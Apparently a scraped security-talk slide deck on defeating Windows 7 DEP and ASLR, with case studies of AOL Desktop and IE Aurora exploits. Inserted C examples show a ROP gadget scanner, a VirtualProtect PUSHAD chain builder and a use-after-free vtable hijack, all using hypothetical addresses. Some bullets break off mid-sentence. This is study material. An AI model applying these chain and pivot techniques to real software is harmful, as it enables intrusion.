Hostile Exploitation


  • 8/9/2019 Hostel Exploitation

    1/35

     

Steven Seeley, Associate consultant at stratsec

Hostile Exploitation under Win7
Leveling the playing field

Overview

● Disclaimer(s)
● What is DEP?
● What is ASLR?
● DEP bypass techniques
  ROP: Return Oriented Programming
● ASLR bypass techniques
● Case study: AOL Desktop, ESI to stack pivot control
  Case study: IE Aurora, object pointer to stack pivot control
● Conclusions
● References
● Questions

Disclaimer(s)

● My apologies in advance if I miss things, I only have up to 20 minutes.
● I didn't invent this stuff!
● Sorry I didn't use vuln.c, I try to keep things practical.
● DEP bypasses are not new! It was being done even before MS officially introduced DEP.

What is DEP?

● NX / XD: No eXecute / eXecute Disable
● First hit the MS scene in Windows XP SP2
● We are at Win7/2008 Server now and most people still OptOut of DEP for a lot of common third party applications (client SKUs still default to the OptIn policy, which only covers Windows' own binaries; server SKUs default to OptOut)
● Two types: software and hardware enforced. The focus here is on hardware enabled DEP.
● The NX flag is set in the CPU (Windows runs in PAE mode by default now: the NX bit lives in the 64-bit PAE page table entries, so a 32-bit kernel needs PAE to enforce it)
● The parent process enables DEP by using a Win

What is DEP?

● Marks data areas of memory, such as the stack and heap, as not executable
● If an attempt is made to execute code from such a page, a STATUS_ACCESS_VIOLATION (0xc0000005) will occur
● Ways to set DEP policy under Win (the /noexecute=OptIn|OptOut|AlwaysOn|AlwaysOff boot option, or bcdedit /set nx <policy> on Vista and later)

What is ASLR?

● Address Space Layout Randomization
● Rebooting the OS leads to randomizing the lower of the two most significant bytes in a module's image base (an image is relocated once per boot, and every process that loads the DLL shares that base)

What is ASLR?

● 8 bits of entropy, so 256 possible values
● When running tests, approximately, only

Wake up! This is where it gets fun!

DEP bypass techniques

● Using Return Oriented Programming, we can return into the Windows API:
● VirtualAlloc(): allocate new executable memory
● HeapCreate(HEAP_CREATE_ENABLE_EXECUTE)
● SetProcessDEPPolicy()
● NtSetInformationProcess()
  (these two only help while DEP is not permanent for the process)
● VirtualProtect(): update memory as executable
● WriteProcessMemory(): copy payload into executable memory. Technique: patch kernel

DEP bypass techniques

● !findantidep shipped with Immunity Debugger v1.0
● Set AL to 1, let ntdll set up our stack and call ZwSetInformationProcess(), and then return to a ptr (eg: jmp esp) that finally passes control to our shellcode
● Perfect, a generic way to bypass DEP without the /permanent flag set!
● but it doesn't defeat enforced hardware DEP :(

DEP bypass techniques

New(er) school techniques to bypass hardware enforced DEP with /noexecute=AlwaysOn:

● We can use special heap sprays (JIT, AA)
● ROP: Return Oriented Programming
  ● Return to one of many Windows APIs
  ● ROP requires dynamic generation of ARG values
  ● Changes/allocates/creates new memory as executable

As Saumil Shah said, ESP is the new EIP. If you pivot control of ESP, then you will win.

DEP bypass techniques

So what's the problem?

● ASLR. We don't know where the ROP gadgets are stored!
● Reliability: different module versions have different code.
● Reliability: program state is important. Opening a file dialog loads a lot more libraries.
● Payload space anyone?
● VET (Vulnerability to Exploit Time) is longer, it might take a few days instead of a few hours.

ROP: Return Oriented Programming

“Preventing the introduction of malicious code is not enough to prevent the execution of malicious computations” - Dino A. Dai Zovi

● Return chaining via gadgets: a single gadget will execute a chain of instructions that will set up an argument value.
● Uses borrowed sequences of instructions that RETN back to the stack.
● Vulnerabilities with heavy character restrictions will provide for a very difficult exploitation experience.
● Is simple to understand and only becomes difficult if other mitigations are involved.
● Example gadget?

ROP: Return Oriented Programming

Example gadget chain (the slide's walk-through, annotated):

    POP EAX ; RETN                          POP 0xffffffff into EAX
    ADD EAX, 20 ; RETN                      EAX is now 0x0000001f
    ADD EAX, 20 ; RETN                      EAX is now 0x0000003f
    XCHG EDX, EAX                           EAX takes EDX's old value, EDX becomes 0x0000003f
    ADD EDX, ... ; RETN                     adjust EDX to the value we want written
    MOV DWORD PTR DS:[EAX+8], EDX ; RETN    write into memory: [EAX+8] now points to the attacker controlled value

The secret to ROP is to keep it simple!

ROP: Return Oriented Programming

Many instructions can be used to pivot control back to the stack.

Structured Exception Handler based:
● ADD ESP, XXX ; RETN
● POP R

Register based (when a register already points at attacker controlled data, as ESI does in the AOL Desktop case study): XCHG reg,ESP ; RETN or MOV ESP,reg ; RETN, and JMP ESP, CALL ESP or PUSH ESP ; RETN when the data is already on the stack.
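The pivots on this slide are what a gadget hunt looks for in a module's code section. As an added example (mine, not the slides' or any tool's code), here is a minimal x86-32 gadget scanner: it tries every byte offset, so it also finds the unintended gadgets hidden inside longer instructions, which is where many usable pivots come from. The code bytes are constructed for the demo and the offsets it reports are buffer offsets, not addresses.

```c
/* Added example: scan a byte buffer for x86-32 stack pivots and short
 * RETN-terminated gadgets. Recognised forms (Intel opcode bytes):
 *   FF E4             JMP ESP           FF D4   CALL ESP
 *   54 C3             PUSH ESP ; RETN   94 C3   XCHG EAX,ESP ; RETN
 *   83 C4 ib C3       ADD ESP,imm8 ; RETN
 *   81 C4 id C3       ADD ESP,imm32 ; RETN
 *   (58..5F){1,3} C3  POP r32 [; POP r32 ...] ; RETN
 * Every byte offset is tried, so "unintended" gadgets inside longer
 * instructions are found too, exactly as a real gadget finder does. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    size_t offset;    /* offset of the gadget's first byte in the buffer */
    char   text[48];  /* readable form, e.g. "POP EBP ; POP EBX ; RETN" */
} gadget_t;

static const char *const REG32[8] =
    { "EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI" };

/* Decode a gadget starting at buf[i]; returns its length in bytes, 0 if none. */
static size_t decode_gadget(const uint8_t *buf, size_t len, size_t i,
                            char *out, size_t outsz)
{
    size_t left = len - i;
    if (left >= 2 && buf[i] == 0xFF && (buf[i+1] == 0xE4 || buf[i+1] == 0xD4)) {
        snprintf(out, outsz, "%s ESP", buf[i+1] == 0xE4 ? "JMP" : "CALL");
        return 2;
    }
    if (left >= 2 && buf[i] == 0x54 && buf[i+1] == 0xC3) {
        snprintf(out, outsz, "PUSH ESP ; RETN");
        return 2;
    }
    if (left >= 2 && buf[i] == 0x94 && buf[i+1] == 0xC3) {
        snprintf(out, outsz, "XCHG EAX,ESP ; RETN");
        return 2;
    }
    if (left >= 4 && buf[i] == 0x83 && buf[i+1] == 0xC4 && buf[i+3] == 0xC3) {
        snprintf(out, outsz, "ADD ESP,0x%X ; RETN", (unsigned)buf[i+2]);
        return 4;
    }
    if (left >= 7 && buf[i] == 0x81 && buf[i+1] == 0xC4 && buf[i+6] == 0xC3) {
        unsigned imm = (unsigned)buf[i+2] | (unsigned)buf[i+3] << 8 |
                       (unsigned)buf[i+4] << 16 | (unsigned)buf[i+5] << 24;
        snprintf(out, outsz, "ADD ESP,0x%X ; RETN", imm);
        return 7;
    }
    if (buf[i] >= 0x58 && buf[i] <= 0x5F) {              /* run of POP r32 */
        size_t j = i, used = 0;
        while (j < len && buf[j] >= 0x58 && buf[j] <= 0x5F && j - i < 3) {
            used += (size_t)snprintf(out + used, outsz - used, "POP %s ; ",
                                     REG32[buf[j] - 0x58]);
            j++;
        }
        if (j < len && buf[j] == 0xC3) {                   /* ... ; RETN */
            snprintf(out + used, outsz - used, "RETN");
            return j - i + 1;
        }
    }
    return 0;
}

/* Fill out[] with every gadget found in buf; returns the count. */
size_t find_gadgets(const uint8_t *buf, size_t len, gadget_t *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i < len && n < max; i++) {
        char text[48];
        if (decode_gadget(buf, len, i, text, sizeof text)) {
            out[n].offset = i;
            snprintf(out[n].text, sizeof out[n].text, "%s", text);
            n++;
        }
    }
    return n;
}

/* CONSTRUCTED code bytes for the demo (not taken from any real module). */
static const uint8_t DEMO_TEXT[] = {
    0x55, 0x8B, 0xEC,               /* push ebp ; mov ebp,esp  (prologue)      */
    0x83, 0xC4, 0x0C, 0xC3,         /* add esp,0xC ; retn      (SEH-style)     */
    0x90, 0x90,                     /* nop ; nop                               */
    0x5D, 0x5B, 0xC3,               /* pop ebp ; pop ebx ; retn                */
    0xFF, 0xE4,                     /* jmp esp                                 */
    0xB8, 0x54, 0xC3, 0x00, 0x00,   /* mov eax,0xC354: hides push esp;retn +1  */
    0x58, 0xC3,                     /* pop eax ; retn                          */
    0x94, 0xC3,                     /* xchg eax,esp ; retn                     */
};

#define MAX_GADGETS 32
static gadget_t demo_found[MAX_GADGETS];

/* Scan DEMO_TEXT; returns the number of gadgets, left in demo_found. */
size_t demo_scan(void)
{
    return find_gadgets(DEMO_TEXT, sizeof DEMO_TEXT, demo_found, MAX_GADGETS);
}
size_t      demo_gadget_offset(size_t k) { return demo_found[k].offset; }
const char *demo_gadget_text(size_t k)   { return demo_found[k].text; }

int main(void)
{
    size_t n = demo_scan();
    for (size_t k = 0; k < n; k++)
        printf("+0x%04zx  %s\n", demo_gadget_offset(k), demo_gadget_text(k));
    return 0;
}
```

Run against the demo buffer it lists seven gadgets, including the PUSH ESP ; RETN that lives inside the immediate of a MOV EAX instruction; a real scan runs the same loop over the .text section of a module that is not ASLR compliant, because only there is the reported offset plus the image base a usable address.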

ASLR bypass techniques

● Bruteforce the base address if the parent process creates child processes. Example: PHP 6.0 Dev str_transliterate() buffer overflow exploit.
● Leak a pointer from the stack, rebase it, calculate the offset. Example: Blaze DVD .plf file buffer overflow exploit. (This is dependent on application state.)
● Memory address disclosure (memory leak). Maybe pointer inferences such as the ActionScript dictionary leak.
● JIT spray with interpreted xor instructions (patched and dead for now).
● One or two byte overwrite (a partial pointer overwrite keeps the randomized high bytes and only changes the low ones).
● .NET user control loading using <object> (blocked from the internet zone now).

ASLR bypass techniques

● Remember, even if your application only has one module that is not ASLR compliant, then you don't really have ASLR (a module linked without /DYNAMICBASE keeps its preferred image base, and its code supplies the gadgets).
● Load
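The check behind this bullet is a look at each loaded module's PE header: IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (0x0040) is what /DYNAMICBASE sets and IMAGE_DLLCHARACTERISTICS_NX_COMPAT (0x0100) what /NXCOMPAT sets. The following is an added example, not from the slides: a parser for that field plus the slide's rule applied to a whole process. The two modules (sysdll.dll and oldplugin.dll) and their image bases are constructed in memory for the demo; nothing is read from disk.

```c
/* Added example: read DllCharacteristics from a PE header and apply the
 * slide's rule that one module without DYNAMIC_BASE defeats ASLR for the
 * process. The images fed in are CONSTRUCTED by build_demo_pe32(). */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040
#define IMAGE_DLLCHARACTERISTICS_NX_COMPAT    0x0100

typedef struct {
    char     name[32];
    uint64_t image_base;          /* preferred base: what you get with ASLR off */
    uint16_t dll_characteristics;
} pe_info_t;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p)
{ return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
static uint64_t rd64(const uint8_t *p) { return (uint64_t)rd32(p) | (uint64_t)rd32(p + 4) << 32; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> 8 * i); }

/* DOS header -> PE signature -> COFF header -> optional header.
 * Returns 0 on success, -1 if img is truncated or not a PE image. */
int pe_module_info(const char *name, const uint8_t *img, size_t len, pe_info_t *out)
{
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return -1;
    uint32_t e_lfanew = rd32(img + 0x3C);
    /* need "PE\0\0" (4) + COFF header (20) + optional header through DllCharacteristics (72) */
    if (e_lfanew > len || len - e_lfanew < 4 + 20 + 72) return -1;
    const uint8_t *nt = img + e_lfanew;
    if (memcmp(nt, "PE\0\0", 4) != 0) return -1;
    if (rd16(nt + 4 + 16) < 72) return -1;             /* SizeOfOptionalHeader too small */
    const uint8_t *opt = nt + 4 + 20;
    uint16_t magic = rd16(opt);
    if (magic == 0x10B)      out->image_base = rd32(opt + 28);   /* PE32  */
    else if (magic == 0x20B) out->image_base = rd64(opt + 24);   /* PE32+ */
    else return -1;
    out->dll_characteristics = rd16(opt + 70);          /* same offset in PE32 and PE32+ */
    snprintf(out->name, sizeof out->name, "%s", name);
    return 0;
}

int module_is_aslr(const pe_info_t *m)
{ return (m->dll_characteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) != 0; }
int module_is_nx(const pe_info_t *m)
{ return (m->dll_characteristics & IMAGE_DLLCHARACTERISTICS_NX_COMPAT) != 0; }

/* The slide's rule: the process has ASLR only if every module does.
 * *weak receives the first offender, or NULL. */
int process_has_aslr(const pe_info_t *mods, size_t n, const pe_info_t **weak)
{
    *weak = NULL;
    for (size_t i = 0; i < n; i++)
        if (!module_is_aslr(&mods[i])) { *weak = &mods[i]; return 0; }
    return 1;
}

/* Write a minimal CONSTRUCTED PE32 header into buf; returns bytes written. */
size_t build_demo_pe32(uint8_t *buf, size_t cap, uint32_t image_base, uint16_t dllchar)
{
    const uint32_t e_lfanew = 0x80, opt_size = 224;     /* standard PE32 optional header size */
    size_t need = e_lfanew + 4 + 20 + opt_size;
    if (cap < need) return 0;
    memset(buf, 0, need);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + 0x3C, e_lfanew);
    uint8_t *nt = buf + e_lfanew;
    memcpy(nt, "PE\0\0", 4);
    wr16(nt + 4, 0x14C);                                /* IMAGE_FILE_MACHINE_I386 */
    wr16(nt + 4 + 16, (uint16_t)opt_size);
    uint8_t *opt = nt + 4 + 20;
    wr16(opt, 0x10B);                                   /* PE32 magic */
    wr32(opt + 28, image_base);
    wr16(opt + 70, dllchar);
    return need;
}

/* Hypothetical process: a system DLL built with /DYNAMICBASE /NXCOMPAT plus a
 * third-party plugin that may or may not have /DYNAMICBASE. Returns the result
 * of process_has_aslr(); *weak_base gets the fixed base the attacker can use. */
int demo_process(int plugin_has_aslr, uint64_t *weak_base)
{
    uint8_t img_a[512], img_b[512];
    pe_info_t mods[2];
    const pe_info_t *weak;
    size_t la = build_demo_pe32(img_a, sizeof img_a, 0x77D00000,
             IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_NX_COMPAT);
    size_t lb = build_demo_pe32(img_b, sizeof img_b, 0x10000000,
             plugin_has_aslr ? IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE : 0);
    if (pe_module_info("sysdll.dll", img_a, la, &mods[0]) != 0) return -1;
    if (pe_module_info("oldplugin.dll", img_b, lb, &mods[1]) != 0) return -1;
    int ok = process_has_aslr(mods, 2, &weak);
    *weak_base = weak ? weak->image_base : 0;
    return ok;
}

/* Anything that is not a PE image must be rejected, not misread. */
int demo_reject_garbage(void)
{
    static const uint8_t junk[] = "MZ this is not a PE image";
    pe_info_t m;
    return pe_module_info("junk", junk, sizeof junk, &m);
}

int main(void)
{
    uint64_t base;
    int ok = demo_process(0, &base);
    printf("process ASLR: %s (fixed base 0x%llx)\n", ok ? "yes" : "NO",
           (unsigned long long)base);
    return 0;
}
```

With the legacy plugin loaded the answer is no and the attacker gets 0x10000000 as a fixed base to mine for gadgets; rebuild the plugin with /DYNAMICBASE (pass 1 to demo_process) and the same process reports yes. The equivalent live check is to walk the loaded module list and read the same field from each mapped header.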

Case study: AOL Desktop .rtx file overflow

Almost typical stack overflow, nice and easy with full EIP control.

Case study: AOL Desktop .rtx file overflow

Screenshot annotations: load EAX with a pointer to our shellcode; the region shown is controlled memory.

Case study: AOL Desktop .rtx file overflow

Screenshot annotations: swap ESI for ESP, taking full control of the stack; valid memory is written at EAX so that we don't fail here.

Given this, can anyone tell me where we are returning to in memory?

Case study: AOL Desktop .rtx file overflow

Just to clarify, this is how the stack may look: pointers everywhere.

Note the hardcoded VirtualProtect() call; if we were to bypass ASLR, this address would have to be generated dynamically.

Case study: AOL Desktop .rtx file overflow

Screenshot annotations: the arguments are in registers, ready for the final pushad ; retn, after which the arguments to VirtualProtect() are all set up on the stack. After the call to VirtualProtect() we will be returning to this address here (the nop sled).

Why this works: PUSHAD pushes EAX, ECX, EDX, EBX, ESP, EBP, ESI and EDI in that order, so EDI ends up lowest on the stack and is what the RETN consumes (it must point at another RETN). ESI then has to hold the address of VirtualProtect(), EBP its return address (a JMP ESP), and the saved ESP, EBX, EDX and ECX become lpAddress, dwSize, flNewProtect (0x40) and lpflOldProtect. EAX sits just above the frame and is the first thing executed after the JMP ESP, hence the nops.
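To tie the note on the previous slide (the VirtualProtect() address has to be generated dynamically) to the frame on this slide and to the character restrictions mentioned on the ROP slide, here is an added example (mine, not the slides' exploit): it rebases a leaked pointer into the live VirtualProtect() address, emits the POP reg ; RETN chain that loads the registers, emulates PUSHAD to show the stdcall frame VirtualProtect() will see, and scans the chain for bad characters. Every address, gadget and RVA in it is hypothetical and nothing in it executes native code.

```c
/* Added example: the data side of the VirtualProtect() PUSHAD technique.
 *  rebase_from_leak()   leaked pointer + RVAs -> live VirtualProtect() address
 *  build_pushad_chain() POP reg ; RETN pairs, then PUSHAD ; RETN
 *  pushad_frame()       what the CPU writes; decode_vp_call() reads it back
 *  scan_bad_chars()     bytes the file format would not carry
 * All addresses, gadgets and RVAs below are HYPOTHETICAL. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct { uint32_t eax, ecx, edx, ebx, ebp, esi, edi; } regs_t;  /* ESP comes from the CPU */
typedef struct {
    uint32_t pop_eax, pop_ecx, pop_edx, pop_ebx, pop_ebp, pop_esi, pop_edi;
    uint32_t pushad_retn;
} gadgets_t;

/* The RVAs come from a local copy of the same DLL version. A base that is not
 * 64 KiB aligned means the RVA does not match the loaded version: return 0. */
uint32_t rebase_from_leak(uint32_t leaked, uint32_t rva_leaked, uint32_t rva_target)
{
    if (leaked < rva_leaked) return 0;
    uint32_t base = leaked - rva_leaked;
    if (base & 0xFFFF) return 0;
    return base + rva_target;
}

static void put32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> 8 * i); }
static uint32_t get32(const uint8_t *p)
{ return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }

#define CHAIN_LEN (7 * 8 + 4)

/* Seven (POP gadget, value) pairs, then PUSHAD ; RETN. Returns CHAIN_LEN. */
size_t build_pushad_chain(const regs_t *r, const gadgets_t *g, uint8_t out[CHAIN_LEN])
{
    const uint32_t pairs[7][2] = {
        { g->pop_eax, r->eax }, { g->pop_ecx, r->ecx }, { g->pop_edx, r->edx },
        { g->pop_ebx, r->ebx }, { g->pop_ebp, r->ebp }, { g->pop_esi, r->esi },
        { g->pop_edi, r->edi },
    };
    size_t off = 0;
    for (int i = 0; i < 7; i++, off += 8) {
        put32(out + off, pairs[i][0]);
        put32(out + off + 4, pairs[i][1]);
    }
    put32(out + off, g->pushad_retn);
    return off + 4;
}

/* PUSHAD pushes EAX,ECX,EDX,EBX,ESP(before),EBP,ESI,EDI, so EDI lands lowest.
 * esp_at_pushad is the stack pointer when PUSHAD runs: just past the chain. */
void pushad_frame(const regs_t *r, uint32_t esp_at_pushad, uint8_t frame[32])
{
    const uint32_t low_to_high[8] =
        { r->edi, r->esi, r->ebp, esp_at_pushad, r->ebx, r->edx, r->ecx, r->eax };
    for (int i = 0; i < 8; i++) put32(frame + 4 * i, low_to_high[i]);
}

/* What the frame means once the RETN after PUSHAD pops its first dword. */
typedef struct {
    uint32_t rop_nop;        /* EDI: popped by RETN, must itself be a RETN        */
    uint32_t callee;         /* ESI: VirtualProtect()                             */
    uint32_t return_addr;    /* EBP: where VirtualProtect returns, e.g. JMP ESP   */
    uint32_t lp_address;     /* ESP: arg 1, start of the region to make executable */
    uint32_t dw_size;        /* EBX: arg 2                                        */
    uint32_t fl_new_protect; /* EDX: arg 3, 0x40 = PAGE_EXECUTE_READWRITE         */
    uint32_t lp_old_protect; /* ECX: arg 4, any writable address                  */
    uint32_t landing;        /* EAX: first dword executed after JMP ESP           */
} vp_call_t;

void decode_vp_call(const uint8_t frame[32], vp_call_t *c)
{
    uint32_t *f[8] = { &c->rop_nop, &c->callee, &c->return_addr, &c->lp_address,
                       &c->dw_size, &c->fl_new_protect, &c->lp_old_protect, &c->landing };
    for (int i = 0; i < 8; i++) *f[i] = get32(frame + 4 * i);
}

/* Count bytes of buf[] that appear in bad[]; *first gets the offset of the first hit. */
size_t scan_bad_chars(const uint8_t *buf, size_t len, const uint8_t *bad, size_t nbad, size_t *first)
{
    size_t hits = 0;
    *first = (size_t)-1;
    for (size_t i = 0; i < len; i++)
        for (size_t k = 0; k < nbad; k++)
            if (buf[i] == bad[k]) { if (!hits) *first = i; hits++; break; }
    return hits;
}

/* Demo with hypothetical numbers; the chain is assumed to sit at 0x0012FF40 on the stack. */
#define CHAIN_STACK_ADDR 0x0012FF40u
size_t demo_vp_chain(vp_call_t *call, size_t *first_bad)
{
    uint32_t vp = rebase_from_leak(0x6D5012AB, 0x12AB, 0x1AD4);       /* -> 0x6D501AD4 */
    gadgets_t g = { 0x6D5011A1, 0x6D5011B2, 0x6D5011C3, 0x6D5011D4,
                    0x6D5011E5, 0x6D5011F6, 0x6D501207, 0x6D5013B8 };
    regs_t r = {
        .eax = 0x90909090,   /* nops: executed first after JMP ESP          */
        .ecx = 0x6D5F0010,   /* lpflOldProtect: a writable .data slot       */
        .edx = 0x00000040,   /* PAGE_EXECUTE_READWRITE                      */
        .ebx = 0x00000201,   /* dwSize                                      */
        .ebp = 0x6D50C0DE,   /* JMP ESP                                     */
        .esi = vp,           /* VirtualProtect()                            */
        .edi = 0x6D50A1C3,   /* RETN (rop nop)                              */
    };
    uint8_t chain[CHAIN_LEN], frame[32];
    size_t n = build_pushad_chain(&r, &g, chain);
    pushad_frame(&r, CHAIN_STACK_ADDR + (uint32_t)n, frame);  /* ESP after the RETN into PUSHAD */
    decode_vp_call(frame, call);
    static const uint8_t bad[] = { 0x00, 0x0A, 0x0D };
    return scan_bad_chars(chain, n, bad, sizeof bad, first_bad);
}

int main(void)
{
    vp_call_t c; size_t first;
    size_t bad = demo_vp_chain(&c, &first);
    printf("VirtualProtect(0x%08X, 0x%X, 0x%X, 0x%08X) returns to 0x%08X; %zu bad bytes, first at +%zu\n",
           c.lp_address, c.dw_size, c.fl_new_protect, c.lp_old_protect, c.return_addr, bad, first);
    return 0;
}
```

The scan reports six bad bytes and every one of them sits inside an argument value (0x40, the size and the lpflOldProtect slot): gadget addresses in a module without null bytes are easy to keep clean, the constants are not, which is why real chains build them with arithmetic gadgets like the ADD EAX,20 sequence shown earlier (pop the negated constant, NEG it, then move it into place). Note also that lpAddress is the saved ESP, which points just past the chain: the region VirtualProtect() unprotects is exactly where the nop sled and shellcode follow.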

Case study: AOL Desktop .rtx file overflow

Profit

Case study: IE Aurora, Internet Explorer use after free memory corruption (CVE-2010-0249)

An object which implements polymorphism (such as our freed object) will contain a virtual function table (vtable) pointer as the first member of the object. We need to change this address to point to a new table containing the address of our ROP stub at the table offset that the vulnerable call site dereferences.

Screenshot annotations: base address of the pointer we are going to use. We would set EAX to 1111, which would later be changed to a pointer to the ROP stub, eg: 0x0

Case study: IE Aurora, Internet Explorer use after free memory corruption (CVE-2010-0249)

What we would do is set the value to a reliable known offset (0x01b) after a decent spray has occurred. So simply, we will set EAX to the same value as ECX so that a call EAX

Case study: IE Aurora, Internet Explorer use after free memory corruption (CVE-2010-0249)

Let's spray a ROP stub and call a pivot to gain control of ESP.

Screenshot annotations: our ROP stub, ready to execute from the stack; final call :)
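The mechanism described across these Aurora slides, as an added example that is not part of the slides: a small deterministic allocator stands in for the IE heap, the object's first member is its vtable pointer, and the spray refills the freed block with pointers to an attacker-owned table. The slot index VSLOT is a hypothetical stand-in for the offset the vulnerable CALL dereferences, and rop_stub stands in for the pivot into the ROP stub.

```c
/* Added example: model of a vtable hijack through a use after free.
 * A tiny LIFO block allocator plays the heap, so the freed block is the
 * first one handed back to the spray, as the real exploit relies on. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* --- toy heap: fixed-size blocks, LIFO free list --- */
#define NBLOCKS    8
#define BLOCK_SIZE 64
static union { uint8_t bytes[BLOCK_SIZE]; void *align; } heap_mem[NBLOCKS];
static int free_list[NBLOCKS];
static int nfree;

static void heap_init(void)
{ nfree = 0; for (int i = NBLOCKS - 1; i >= 0; i--) free_list[nfree++] = i; }
static void *heap_alloc(void)
{ return nfree ? heap_mem[free_list[--nfree]].bytes : NULL; }
static void heap_free(void *p)
{
    for (int i = 0; i < NBLOCKS; i++)
        if (p == (void *)heap_mem[i].bytes) { free_list[nfree++] = i; return; }
}

/* --- the victim object, laid out like a C++ object with virtual methods --- */
#define VTABLE_SLOTS 16
#define VSLOT 13                          /* HYPOTHETICAL: CALL [vtable + 13*4] */
typedef struct element element_t;
typedef int (*vmethod_t)(element_t *self);
typedef struct { vmethod_t slot[VTABLE_SLOTS]; } vtable_t;
struct element { const vtable_t *vt; int id; };   /* vtable pointer is the first member */

static int element_get_id(element_t *self) { return self->id; }
static const vtable_t element_vtable = { .slot = { [VSLOT] = element_get_id } };

/* --- attacker side --- */
static int rop_stub(element_t *self) { (void)self; return 0xD00D; }  /* stands in for the pivot */
static vtable_t fake_vtable;

/* Spray: take every free block and fill it with pointers to the fake vtable,
 * so whichever freed block the dangling object lives in, [obj] is our table. */
static void spray(void)
{
    const vtable_t *fvt = &fake_vtable;
    void *blk;
    while ((blk = heap_alloc()) != NULL)
        for (size_t off = 0; off + sizeof fvt <= BLOCK_SIZE; off += sizeof fvt)
            memcpy((uint8_t *)blk + off, &fvt, sizeof fvt);
}

/* Returns the result of the virtual call made through the dangling pointer;
 * *legit receives the result of the same call made before the free. */
int simulate_uaf(int *legit)
{
    heap_init();
    memset(&fake_vtable, 0, sizeof fake_vtable);
    fake_vtable.slot[VSLOT] = rop_stub;

    element_t *ev = heap_alloc();            /* the object the page creates      */
    ev->vt = &element_vtable;
    ev->id = 7;
    *legit = ev->vt->slot[VSLOT](ev);        /* normal virtual call -> 7         */

    heap_free(ev);                           /* freed, but a reference survives  */
    spray();                                 /* attacker reoccupies the block    */

    return ev->vt->slot[VSLOT](ev);          /* same call site -> rop_stub       */
}

int main(void)
{
    int legit;
    int hijacked = simulate_uaf(&legit);
    printf("before free: %d, after spray: 0x%X\n", legit, hijacked);
    return 0;
}
```

The call site never changes; what changes is the dword at [obj] and therefore which table the slot is read from. In the real exploit the sprayed content is the ROP stub itself with the pointer pattern repeated through it, so that the pointer, the table and the stub all resolve inside the spray.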

Case study: IE Aurora, Internet Explorer use after free memory corruption (CVE-2010-0249)

Profit

Conclusion: Are we safe?

● DEP and ASLR together are a powerful mix, one complements the other.
● You will see less and less public practical exploitation against Win7/Server 2008 as both mechanisms are on by default.
● The 0day techniques to bypass these mitigations are worth more than the 0days themselves. These will be kept private for sure.

Conclusions: Are we safe?

● Both mitigations are on by default and will stop a fair amount of exploitation, but not all. Specific analysis on individual platforms/applications will need to be conducted to determine the exploitability and impact.
● This process will become expensive, so clients will miss out?
● Oh boy, and I haven't even talked about Protected Mode or EMET.

Thanks!

tecr0c, wireghoul, corelanc0d3r

Questions?